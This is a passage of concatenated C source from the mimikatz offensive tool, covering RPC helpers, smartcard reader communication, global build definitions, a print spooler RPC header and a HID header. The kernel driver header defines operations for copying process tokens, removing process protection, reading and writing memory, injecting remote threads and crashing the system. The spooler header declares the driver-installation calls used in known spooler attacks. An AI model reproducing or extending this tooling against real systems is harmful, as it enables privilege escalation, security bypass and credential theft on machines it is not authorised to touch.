BOOL kull_m_rpc_createBinding(LPCWSTR uuid, LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, BOOL addServiceToNetworkAddr, DWORD AuthnSvc, RPC_AUTH_IDENTITY_HANDLE hAuth, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *)); 37 | BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding); 38 | RPC_STATUS CALLBACK kull_m_rpc_nice_SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle); 39 | RPC_STATUS CALLBACK kull_m_rpc_nice_verb_SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle); 40 | void kull_m_rpc_getArgs(int argc, wchar_t * argv[], LPCWSTR *szRemote, LPCWSTR *szProtSeq, LPCWSTR *szEndpoint, LPCWSTR *szService, LPCWSTR szDefaultService, DWORD *AuthnSvc, DWORD defAuthnSvc, BOOL *isNullSession, SEC_WINNT_AUTH_IDENTITY *pAuthIdentity, GUID *altGuid, BOOL printIt); 41 | PMIDL_STUB_DESC kull_m_rpc_find_stub(LPCWSTR szModuleName, const RPC_SYNTAX_IDENTIFIER *pInterfaceId); 42 | BOOL kull_m_rpc_replace_first_routine_pair_direct(const GENERIC_BINDING_ROUTINE_PAIR *pOriginalBindingPair, const GENERIC_BINDING_ROUTINE_PAIR *pNewBindingPair); 43 | BOOL kull_m_rpc_replace_first_routine_pair(LPCWSTR szModuleName, const RPC_SYNTAX_IDENTIFIER *pInterfaceId, const GENERIC_BINDING_ROUTINE_PAIR *pNewBindingPair, PGENERIC_BINDING_ROUTINE_PAIR pOriginalBindingPair, const GENERIC_BINDING_ROUTINE_PAIR **ppOriginalBindingPair); 44 | 45 | typedef struct _KULL_M_RPC_FCNSTRUCT { 46 | PVOID addr; 47 | size_t size; 48 | } KULL_M_RPC_FCNSTRUCT, *PKULL_M_RPC_FCNSTRUCT; 49 | 50 | void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes); 51 | void __RPC_USER midl_user_free(void __RPC_FAR * p); 52 | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize); 53 | void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size); 54 | void __RPC_USER AllocFcn(void *State, char **pBuffer, unsigned int *pSize); 55 | 56 | #define RPC_EXCEPTION (RpcExceptionCode() != STATUS_ACCESS_VIOLATION) && \ 57 | (RpcExceptionCode() != STATUS_DATATYPE_MISALIGNMENT) && \ 58 | (RpcExceptionCode() != STATUS_PRIVILEGED_INSTRUCTION) && \ 59 | (RpcExceptionCode() != STATUS_ILLEGAL_INSTRUCTION) && \ 60 | (RpcExceptionCode() != STATUS_BREAKPOINT) && \ 61 | (RpcExceptionCode() != STATUS_STACK_OVERFLOW) && \ 62 | (RpcExceptionCode() != STATUS_IN_PAGE_ERROR) && \ 63 | (RpcExceptionCode() != STATUS_ASSERTION_FAILURE) && \ 64 | (RpcExceptionCode() != STATUS_STACK_BUFFER_OVERRUN) && \ 65 | (RpcExceptionCode() != STATUS_GUARD_PAGE_VIOLATION) 66 | 67 | typedef void (* PGENERIC_RPC_DECODE) (IN handle_t pHandle, IN PVOID pObject); 68 | typedef void (* PGENERIC_RPC_ENCODE) (IN handle_t pHandle, IN PVOID pObject); 69 | typedef void (* PGENERIC_RPC_FREE) (IN handle_t pHandle, IN PVOID pObject); 70 | typedef size_t (* PGENERIC_RPC_ALIGNSIZE) (IN handle_t pHandle, IN PVOID pObject); 71 | 72 | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PGENERIC_RPC_DECODE fDecode); 73 | void kull_m_rpc_Generic_Free(PVOID data, PGENERIC_RPC_FREE fFree); 74 | BOOL kull_m_rpc_Generic_Encode(PVOID pObject, PVOID *data, DWORD *size, PGENERIC_RPC_ENCODE fEncode, PGENERIC_RPC_ALIGNSIZE fAlignSize); -------------------------------------------------------------------------------- /mimidrv/ioctl.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #define IOCTL_MIMIDRV_RAW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x000, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 7 | #define IOCTL_MIMIDRV_PING CTL_CODE(FILE_DEVICE_UNKNOWN, 0x001, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 8 | #define IOCTL_MIMIDRV_BSOD CTL_CODE(FILE_DEVICE_UNKNOWN, 0x002, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 9 | #define IOCTL_MIMIDRV_DEBUG_BUFFER CTL_CODE(FILE_DEVICE_UNKNOWN, 0x003, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 10 | 11 | #define IOCTL_MIMIDRV_SYSENVSET CTL_CODE(FILE_DEVICE_UNKNOWN, 0x004, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 12 | 13 | #define IOCTL_MIMIDRV_PROCESS_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x010, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 14 | #define IOCTL_MIMIDRV_PROCESS_TOKEN CTL_CODE(FILE_DEVICE_UNKNOWN, 0x011, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 15 | #define IOCTL_MIMIDRV_PROCESS_PROTECT CTL_CODE(FILE_DEVICE_UNKNOWN, 0x012, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 16 | #define IOCTL_MIMIDRV_PROCESS_FULLPRIV CTL_CODE(FILE_DEVICE_UNKNOWN, 0x013, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 17 | 18 | #define IOCTL_MIMIDRV_MODULE_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x020, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 19 | 20 | #define IOCTL_MIMIDRV_SSDT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x030, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 21 | 22 | #define IOCTL_MIMIDRV_NOTIFY_PROCESS_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x040, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 23 | #define IOCTL_MIMIDRV_NOTIFY_THREAD_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x041, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 24 | #define IOCTL_MIMIDRV_NOTIFY_IMAGE_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x042, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 25 | #define IOCTL_MIMIDRV_NOTIFY_REG_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x043, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 26 | #define IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x044, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 27 | 28 | #define IOCTL_MIMIDRV_FILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x050, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 29 | #define IOCTL_MIMIDRV_MINIFILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x051, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 30 | 31 | #define IOCTL_MIMIDRV_VM_READ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x060, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 32 | #define IOCTL_MIMIDRV_VM_WRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x061, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 33 | #define IOCTL_MIMIDRV_VM_ALLOC CTL_CODE(FILE_DEVICE_UNKNOWN, 0x062, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 34 | #define IOCTL_MIMIDRV_VM_FREE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x063, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 35 | 36 | #define IOCTL_MIMIDRV_CREATEREMOTETHREAD CTL_CODE(FILE_DEVICE_UNKNOWN, 0x070, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 37 | 38 | typedef struct _PS_PROTECTION { 39 | UCHAR Type : 3; 40 | UCHAR Audit : 1; 41 | UCHAR Signer: 4; 42 | } PS_PROTECTION, *PPS_PROTECTION; 43 | 44 | typedef struct _KIWI_PROCESS_SIGNATURE_PROTECTION { 45 | UCHAR SignatureLevel; 46 | UCHAR SectionSignatureLevel; 47 | PS_PROTECTION Protection; 48 | } KIWI_PROCESS_SIGNATURE_PROTECTION, *PKIWI_PROCESS_SIGNATURE_PROTECTION; 49 | 50 | typedef struct _MIMIDRV_PROCESS_PROTECT_INFORMATION { 51 | ULONG processId; 52 | KIWI_PROCESS_SIGNATURE_PROTECTION SignatureProtection; 53 | } MIMIDRV_PROCESS_PROTECT_INFORMATION, *PMIMIDRV_PROCESS_PROTECT_INFORMATION; 54 | 55 | typedef struct _MIMIDRV_PROCESS_TOKEN_FROM_TO { 56 | ULONG fromProcessId; 57 | ULONG toProcessId; 58 | } MIMIDRV_PROCESS_TOKEN_FROM_TO, *PMIMIDRV_PROCESS_TOKEN_FROM_TO; 59 | 60 | typedef DWORD (NTAPI * PTHREAD_START_ROUTINE)(PVOID lpThreadParameter); 61 | typedef PTHREAD_START_ROUTINE LPTHREAD_START_ROUTINE; 62 | 63 | typedef struct _MIMIDRV_THREAD_INFO { 64 | PTHREAD_START_ROUTINE pRoutine; 65 | PVOID pArg; 66 | } MIMIDRV_THREAD_INFO, *PMIMIDRV_THREAD_INFO; 67 | 68 | typedef struct _MIMIDRV_VARIABLE_NAME_AND_VALUE { 69 | ULONG ValueOffset; 70 | ULONG ValueLength; 71 | ULONG Attributes; 72 | GUID VendorGuid; 73 | WCHAR Name[ANYSIZE_ARRAY]; 74 | //UCHAR Value[ANYSIZE_ARRAY]; 75 | } MIMIDRV_VARIABLE_NAME_AND_VALUE, *PMIMIDRV_VARIABLE_NAME_AND_VALUE; -------------------------------------------------------------------------------- /modules/kull_m_acr.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_acr.h" 7 | 8 | BOOL kull_m_acr_init(SCARDCONTEXT hContext, LPCWSTR szReaderName, BOOL withoutCard, LPVOID suppdata, BOOL descr, PKULL_M_ACR_COMM comm) 9 | { 10 | BOOL status = FALSE; 11 | DWORD dwActiveProtocol; 12 | LONG scStatus; 13 | comm->hCard = 0; 14 | comm->withoutCard = withoutCard; 15 | comm->suppdata = suppdata; 16 | comm->descr = descr; 17 | scStatus = SCardConnect(hContext, szReaderName, withoutCard ? SCARD_SHARE_DIRECT : SCARD_SHARE_SHARED, withoutCard ? SCARD_PROTOCOL_UNDEFINED : SCARD_PROTOCOL_Tx, &comm->hCard, &dwActiveProtocol); 18 | if(!(status = (scStatus == SCARD_S_SUCCESS))) 19 | PRINT_ERROR(L"SCardConnect: 0x%08x\n", scStatus); 20 | return status; 21 | } 22 | 23 | void kull_m_acr_finish(PKULL_M_ACR_COMM comm) 24 | { 25 | LONG scStatus; 26 | if(comm->hCard) 27 | { 28 | scStatus = SCardDisconnect(comm->hCard, SCARD_LEAVE_CARD); 29 | if(scStatus == SCARD_S_SUCCESS) 30 | comm->hCard = 0; 31 | else PRINT_ERROR(L"SCardDisconnect: 0x%08x\n", scStatus); 32 | } 33 | } 34 | 35 | BOOL kull_m_arc_sendrecv(PKULL_M_ACR_COMM comm, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult) 36 | { 37 | BOOL status = FALSE; 38 | LONG scStatus; 39 | DWORD ret = *cbResult; 40 | 41 | if(comm->hCard) 42 | { 43 | if(cbData <= ACR_MAX_LEN) 44 | { 45 | if(comm->descr) 46 | { 47 | kprintf(L"ACR > "); 48 | kull_m_string_wprintf_hex(pbData, cbData, 1); 49 | kprintf(L"\n"); 50 | } 51 | scStatus = comm->withoutCard ? 52 | SCardControl(comm->hCard, IOCTL_CCID_ESCAPE, pbData, cbData, pbResult, *cbResult, &ret) : 53 | SCardTransmit(comm->hCard, NULL, pbData, cbData, NULL, pbResult, &ret); 54 | 55 | if(scStatus == SCARD_S_SUCCESS) 56 | { 57 | if(comm->descr) 58 | { 59 | kprintf(L"ACR < "); 60 | kull_m_string_wprintf_hex(pbResult, ret, 1); 61 | kprintf(L"\n"); 62 | } 63 | if(status = (ret <= *cbResult)) 64 | *cbResult = (UINT16) ret; 65 | } 66 | else PRINT_ERROR(L"%s: 0x%08x\n", comm->withoutCard ? L"SCardControl" : L"SCardTransmit", scStatus); 67 | } 68 | else PRINT_ERROR(L"cbData = %hu / cbResult = %hu (max is %hu)\n", cbData, cbResult, ACR_MAX_LEN); 69 | } 70 | else PRINT_ERROR(L"No handle to Card\n"); 71 | return status; 72 | } 73 | 74 | BOOL kull_m_acr_sendrecv_ins(PKULL_M_ACR_COMM comm, BYTE cla, BYTE ins, BYTE p1, BYTE p2, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, BOOL noLe) 75 | { 76 | BOOL status = FALSE; 77 | BYTE buffer[ACR_MAX_LEN], idx = 4; 78 | //BYTE max = sizeof(buffer) - idx - 79 | // CHECK SIZES ! 80 | buffer[0] = cla; 81 | buffer[1] = ins; 82 | buffer[2] = p1; 83 | buffer[3] = p2; 84 | 85 | if(cbData) 86 | { 87 | buffer[idx++] = (BYTE) cbData; 88 | RtlCopyMemory(buffer + idx, pbData, cbData); 89 | idx += cbData; 90 | } 91 | if(!noLe && *cbResult) 92 | buffer[idx++] = (BYTE) *cbResult; 93 | return kull_m_arc_sendrecv(comm, buffer, idx, pbResult, cbResult); 94 | } 95 | 96 | BOOL CALLBACK kull_m_arcr_SendRecvDirect(const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, LPVOID suppdata) 97 | { 98 | BOOL status = FALSE; 99 | BYTE buffer[ACR_MAX_LEN]; 100 | UINT16 cbOut = *cbResult + 2; 101 | 102 | if(suppdata) 103 | { 104 | if(cbOut <= sizeof(buffer)) 105 | { 106 | if(kull_m_acr_sendrecv_ins((PKULL_M_ACR_COMM) suppdata, 0xff, 0x00, 0x00, 0x00, pbData, cbData, buffer, &cbOut, TRUE)) 107 | { 108 | if(cbOut >= 2) 109 | { 110 | if(*(PUINT16) (buffer + cbOut - 2) == 0x0090) 111 | { 112 | cbOut -= 2; 113 | if(status = (cbOut <= *cbResult)) 114 | { 115 | RtlCopyMemory(pbResult, buffer, cbOut); 116 | *cbResult = cbOut; 117 | } 118 | else PRINT_ERROR(L"cbResult = %hu (data is %u)\n", *cbResult, cbOut); 119 | } 120 | else PRINT_ERROR(L"RET: %02x %02x\n", buffer[cbOut - 2], buffer[cbOut - 1]); 121 | } 122 | else PRINT_ERROR(L"cbRetBuffer = %hu (not long enough)\n", cbOut); 123 | } 124 | 125 | } 126 | else PRINT_ERROR(L"cbOut = %hu (max is %hu)\n", cbOut, sizeof(buffer)); 127 | } 128 | else PRINT_ERROR(L"No suppdata (ACR_COMM)\n"); 129 | return status; 130 | } -------------------------------------------------------------------------------- /inc/globals.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | https://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : https://creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include 8 | #define WIN32_NO_STATUS 9 | #define SECURITY_WIN32 10 | #define CINTERFACE 11 | #define COBJMACROS 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include "../modules/kull_m_output.h" 21 | //#define KERBEROS_TOOLS 22 | //#define SERVICE_INCONTROL 23 | #define NET_MODULE 24 | #if defined(_M_ARM64) 25 | #define MIMIKATZ_ARCH L"arm64" 26 | #elif defined(_M_X64) 27 | #define MIMIKATZ_ARCH L"x64" 28 | #elif defined(_M_IX86) 29 | #define MIMIKATZ_ARCH L"x86" 30 | #endif 31 | 32 | #define MIMIKATZ L"mimikatz" 33 | #define MIMIKATZ_VERSION L"2.2.0" 34 | #define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour" 35 | #define MIMIKATZ_MAX_WINBUILD L"19041" 36 | #define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__) 37 | #define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\"" 38 | #define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log" 39 | #define MIMIKATZ_DRIVER L"mimidrv" 40 | #define MIMIKATZ_KERBEROS_EXT L"kirbi" 41 | #define MIMIKATZ_SERVICE MIMIKATZ L"svc" 42 | 43 | #if defined(_WINDLL) 44 | #define MIMIKATZ_AUTO_COMMAND_START 0 45 | #else 46 | #define MIMIKATZ_AUTO_COMMAND_START 1 47 | #endif 48 | 49 | #if defined(_POWERKATZ) 50 | #define MIMIKATZ_AUTO_COMMAND_STRING L"powershell" 51 | #else 52 | #define MIMIKATZ_AUTO_COMMAND_STRING L"commandline" 53 | #endif 54 | 55 | #if !defined(NT_SUCCESS) 56 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 57 | #endif 58 | 59 | #if !defined(PRINT_ERROR) 60 | #define PRINT_ERROR(...) (kprintf(L"ERROR " TEXT(__FUNCTION__) L" ; " __VA_ARGS__)) 61 | #endif 62 | 63 | #if !defined(PRINT_ERROR_AUTO) 64 | #define PRINT_ERROR_AUTO(func) (kprintf(L"ERROR " TEXT(__FUNCTION__) L" ; " func L" (0x%08x)\n", GetLastError())) 65 | #endif 66 | 67 | #if !defined(W00T) 68 | #define W00T(...) (kprintf(TEXT(__FUNCTION__) L" w00t! ; " __VA_ARGS__)) 69 | #endif 70 | 71 | DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NUMBER; 72 | 73 | #if !defined(MS_ENH_RSA_AES_PROV_XP) 74 | #define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)" 75 | #endif 76 | 77 | #if !defined(MS_PLATFORM_CRYPTO_PROVIDER) 78 | #define MS_PLATFORM_CRYPTO_PROVIDER L"Microsoft Platform Crypto Provider" 79 | #endif 80 | 81 | #if !defined(NCRYPT_PCP_PLATFORM_TYPE_PROPERTY) 82 | #define NCRYPT_PCP_PLATFORM_TYPE_PROPERTY L"PCP_PLATFORM_TYPE" 83 | #endif 84 | 85 | #if !defined(TPM_RSA_SRK_SEAL_KEY) 86 | #define TPM_RSA_SRK_SEAL_KEY L"MICROSOFT_PCP_KSP_RSA_SEAL_KEY_3BD1C4BF-004E-4E2F-8A4D-0BF633DCB074" 87 | #endif 88 | 89 | #if !defined(NCRYPT_SEALING_FLAG) 90 | #define NCRYPT_SEALING_FLAG 0x00000100 91 | #endif 92 | 93 | #if !defined(SCARD_PROVIDER_CARD_MODULE) 94 | #define SCARD_PROVIDER_CARD_MODULE 0x80000001 95 | #endif 96 | 97 | #define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID))) 98 | 99 | #define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0)) 100 | #define KIWI_NEVERTIME(filetime) (*(PLONGLONG) filetime = MAXLONGLONG) 101 | 102 | #define LM_NTLM_HASH_LENGTH 16 103 | 104 | #define KULL_M_WIN_BUILD_XP 2600 105 | #define KULL_M_WIN_BUILD_2K3 3790 106 | #define KULL_M_WIN_BUILD_VISTA 6000 107 | #define KULL_M_WIN_BUILD_7 7600 108 | #define KULL_M_WIN_BUILD_8 9200 109 | #define KULL_M_WIN_BUILD_BLUE 9600 110 | #define KULL_M_WIN_BUILD_10_1507 10240 111 | #define KULL_M_WIN_BUILD_10_1511 10586 112 | #define KULL_M_WIN_BUILD_10_1607 14393 113 | #define KULL_M_WIN_BUILD_10_1703 15063 114 | #define KULL_M_WIN_BUILD_10_1709 16299 115 | #define KULL_M_WIN_BUILD_10_1803 17134 116 | #define KULL_M_WIN_BUILD_10_1809 17763 117 | #define KULL_M_WIN_BUILD_10_1903 18362 118 | #define KULL_M_WIN_BUILD_10_1909 18363 119 | #define KULL_M_WIN_BUILD_10_2004 19041 120 | #define KULL_M_WIN_BUILD_10_20H2 19042 121 | #define KULL_M_WIN_BUILD_2022 20348 122 | 123 | #define KULL_M_WIN_MIN_BUILD_XP 2500 124 | #define KULL_M_WIN_MIN_BUILD_2K3 3000 125 | #define KULL_M_WIN_MIN_BUILD_VISTA 5000 126 | #define KULL_M_WIN_MIN_BUILD_7 7000 127 | #define KULL_M_WIN_MIN_BUILD_8 8000 128 | #define KULL_M_WIN_MIN_BUILD_BLUE 9400 129 | #define KULL_M_WIN_MIN_BUILD_10 9800 130 | #define KULL_M_WIN_MIN_BUILD_11 22000 -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-rprn.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | /* 4 | #define PRINTER_CHANGE_ADD_JOB 0x00000100 5 | #define PRINTER_CHANGE_ALL 0x7777FFFF 6 | */ 7 | #define PRINTER_NOTIFY_CATEGORY_ALL 0x00010000 8 | #define APD_INSTALL_WARNED_DRIVER 0x00008000 9 | 10 | typedef void *PRINTER_HANDLE; 11 | 12 | typedef wchar_t *STRING_HANDLE; 13 | 14 | typedef struct _DEVMODE_CONTAINER { 15 | DWORD cbBuf; 16 | BYTE *pDevMode; 17 | } DEVMODE_CONTAINER; 18 | 19 | typedef struct __DRIVER_INFO_2 { 20 | DWORD cVersion; 21 | DWORD NameOffset; 22 | DWORD EnvironmentOffset; 23 | DWORD DriverPathOffset; 24 | DWORD DataFileOffset; 25 | DWORD ConfigFileOffset; 26 | } _DRIVER_INFO_2, *_PDRIVER_INFO_2; 27 | 28 | typedef struct _RPC_DRIVER_INFO_3 { 29 | DWORD cVersion; 30 | wchar_t *pName; 31 | wchar_t *pEnvironment; 32 | wchar_t *pDriverPath; 33 | wchar_t *pDataFile; 34 | wchar_t *pConfigFile; 35 | wchar_t *pHelpFile; 36 | wchar_t *pMonitorName; 37 | wchar_t *pDefaultDataType; 38 | DWORD cchDependentFiles; 39 | wchar_t *pDependentFiles; 40 | } RPC_DRIVER_INFO_3; 41 | 42 | typedef struct _RPC_DRIVER_INFO_4 { 43 | DWORD cVersion; 44 | wchar_t *pName; 45 | wchar_t *pEnvironment; 46 | wchar_t *pDriverPath; 47 | wchar_t *pDataFile; 48 | wchar_t *pConfigFile; 49 | wchar_t *pHelpFile; 50 | wchar_t *pMonitorName; 51 | wchar_t *pDefaultDataType; 52 | DWORD cchDependentFiles; 53 | wchar_t *pDependentFiles; 54 | DWORD cchPreviousNames; 55 | wchar_t *pszzPreviousNames; 56 | } RPC_DRIVER_INFO_4; 57 | 58 | typedef struct _RPC_DRIVER_INFO_6 { 59 | DWORD cVersion; 60 | wchar_t *pName; 61 | wchar_t *pEnvironment; 62 | wchar_t *pDriverPath; 63 | wchar_t *pDataFile; 64 | wchar_t *pConfigFile; 65 | wchar_t *pHelpFile; 66 | wchar_t *pMonitorName; 67 | wchar_t *pDefaultDataType; 68 | DWORD cchDependentFiles; 69 | wchar_t *pDependentFiles; 70 | DWORD cchPreviousNames; 71 | wchar_t *pszzPreviousNames; 72 | FILETIME ftDriverDate; 73 | DWORDLONG dwlDriverVersion; 74 | wchar_t *pMfgName; 75 | wchar_t *pOEMUrl; 76 | wchar_t *pHardwareID; 77 | wchar_t *pProvider; 78 | } RPC_DRIVER_INFO_6; 79 | 80 | typedef struct _RPC_DRIVER_INFO_8 { 81 | DWORD cVersion; 82 | wchar_t *pName; 83 | wchar_t *pEnvironment; 84 | wchar_t *pDriverPath; 85 | wchar_t *pDataFile; 86 | wchar_t *pConfigFile; 87 | wchar_t *pHelpFile; 88 | wchar_t *pMonitorName; 89 | wchar_t *pDefaultDataType; 90 | DWORD cchDependentFiles; 91 | wchar_t *pDependentFiles; 92 | DWORD cchPreviousNames; 93 | wchar_t *pszzPreviousNames; 94 | FILETIME ftDriverDate; 95 | DWORDLONG dwlDriverVersion; 96 | wchar_t *pMfgName; 97 | wchar_t *pOEMUrl; 98 | wchar_t *pHardwareID; 99 | wchar_t *pProvider; 100 | wchar_t *pPrintProcessor; 101 | wchar_t *pVendorSetup; 102 | DWORD cchColorProfiles; 103 | wchar_t *pszzColorProfiles; 104 | wchar_t *pInfPath; 105 | DWORD dwPrinterDriverAttributes; 106 | DWORD cchCoreDependencies; 107 | wchar_t *pszzCoreDriverDependencies; 108 | FILETIME ftMinInboxDriverVerDate; 109 | DWORDLONG dwlMinInboxDriverVerVersion; 110 | } RPC_DRIVER_INFO_8; 111 | 112 | typedef struct _DRIVER_CONTAINER { 113 | DWORD Level; 114 | union { 115 | DRIVER_INFO_1 *pNotUsed; 116 | DRIVER_INFO_2 *Level2; 117 | RPC_DRIVER_INFO_3 *Level3; 118 | RPC_DRIVER_INFO_4 *Level4; 119 | RPC_DRIVER_INFO_6 *Level6; 120 | RPC_DRIVER_INFO_8 *Level8; 121 | } DriverInfo; 122 | } DRIVER_CONTAINER; 123 | 124 | DWORD RpcOpenPrinter(STRING_HANDLE pPrinterName, PRINTER_HANDLE *pHandle,wchar_t *pDatatype, DEVMODE_CONTAINER *pDevModeContainer, DWORD AccessRequired); 125 | DWORD RpcEnumPrinterDrivers(STRING_HANDLE pName,wchar_t *pEnvironment, DWORD Level, BYTE *pDrivers, DWORD cbBuf, DWORD *pcbNeeded, DWORD *pcReturned); 126 | DWORD RpcGetPrinterDriverDirectory(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Level, BYTE *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded); 127 | DWORD RpcClosePrinter(PRINTER_HANDLE *phPrinter); 128 | DWORD RpcFindClosePrinterChangeNotification(PRINTER_HANDLE hPrinter); 129 | DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t *pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE *pBuffer); 130 | DWORD RpcDeletePrinterDriverEx(STRING_HANDLE pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum); 131 | DWORD RpcAddPrinterDriverEx(STRING_HANDLE pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags); 132 | 133 | extern RPC_IF_HANDLE winspool_v1_0_c_ifspec; 134 | 135 | handle_t __RPC_USER STRING_HANDLE_bind(STRING_HANDLE); 136 | void __RPC_USER STRING_HANDLE_unbind(STRING_HANDLE, handle_t); -------------------------------------------------------------------------------- /modules/kull_m_hid.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | #include 10 | typedef struct _HIDP_PREPARSED_DATA * PHIDP_PREPARSED_DATA; 11 | 12 | typedef USHORT USAGE, *PUSAGE; 13 | typedef struct _HIDP_CAPS 14 | { 15 | USAGE Usage; 16 | USAGE UsagePage; 17 | USHORT InputReportByteLength; 18 | USHORT OutputReportByteLength; 19 | USHORT FeatureReportByteLength; 20 | USHORT Reserved[17]; 21 | 22 | USHORT NumberLinkCollectionNodes; 23 | 24 | USHORT NumberInputButtonCaps; 25 | USHORT NumberInputValueCaps; 26 | USHORT NumberInputDataIndices; 27 | 28 | USHORT NumberOutputButtonCaps; 29 | USHORT NumberOutputValueCaps; 30 | USHORT NumberOutputDataIndices; 31 | 32 | USHORT NumberFeatureButtonCaps; 33 | USHORT NumberFeatureValueCaps; 34 | USHORT NumberFeatureDataIndices; 35 | } HIDP_CAPS, *PHIDP_CAPS; 36 | 37 | typedef struct _HIDD_ATTRIBUTES { 38 | ULONG Size; 39 | USHORT VendorID; 40 | USHORT ProductID; 41 | USHORT VersionNumber; 42 | } HIDD_ATTRIBUTES, *PHIDD_ATTRIBUTES; 43 | 44 | extern void __stdcall HidD_GetHidGuid(__out LPGUID HidGuid); 45 | extern NTSTATUS __stdcall HidP_GetCaps(__in PHIDP_PREPARSED_DATA PreparsedData, __out PHIDP_CAPS Capabilities); 46 | extern BOOLEAN __stdcall HidD_GetAttributes(__in HANDLE HidDeviceObject, __out PHIDD_ATTRIBUTES Attributes); 47 | extern BOOLEAN __stdcall HidD_GetPreparsedData(__in HANDLE HidDeviceObject, __out PHIDP_PREPARSED_DATA * PreparsedData); 48 | extern BOOLEAN __stdcall HidD_FreePreparsedData(__in PHIDP_PREPARSED_DATA PreparsedData); 49 | extern BOOLEAN __stdcall HidD_SetFeature(__in HANDLE HidDeviceObject, __in PVOID ReportBuffer, __in 